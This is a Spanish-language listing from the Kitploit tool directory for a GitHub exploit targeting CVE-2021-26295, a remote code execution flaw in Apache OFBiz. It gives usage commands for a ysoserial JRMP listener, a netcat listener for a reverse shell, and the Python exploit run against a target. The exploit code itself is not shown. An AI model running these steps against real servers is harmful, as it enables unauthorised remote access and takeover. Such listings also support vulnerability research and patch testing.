Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-26295 — Exploit para CVE-2021-26295 (RCE en Apache OFBiz) que utiliza el listener JRMP de ysoserial para ejecutar comandos y obtener una shell inversa en objetivos vulnerables. | Kitploit
Herramientas/GitHubGitHub/dskho/cve-2021-26295
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubdskho/cve-2021-26295

CVE-2021-26295

Exploit para CVE-2021-26295 (RCE en Apache OFBiz) que utiliza el listener JRMP de ysoserial para ejecutar comandos y obtener una shell inversa en objetivos vulnerables.

Ver Repositorio
101hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-26295

CVE-2021-26295 EXP puede obtener una reverse shell exitosamente

Este artículo y la herramienta son solo para compartir tecnología. Está estrictamente prohibido su uso con fines ilegales. Cualquier consecuencia derivada será responsabilidad del usuario.

EXP para desencadenar la ejecución de comandos

1. Inicie el listener RMI en el VPS en el puerto 9999

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[comando a ejecutar]'

2. Inicie el listener en el VPS en el puerto

nc
64444
root@kitploit:~
nc -lvp 64444

3. Ejecute el script de python

root@kitploit:~
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

Ejemplo

1616580076993

1616580247015

Descargar herramienta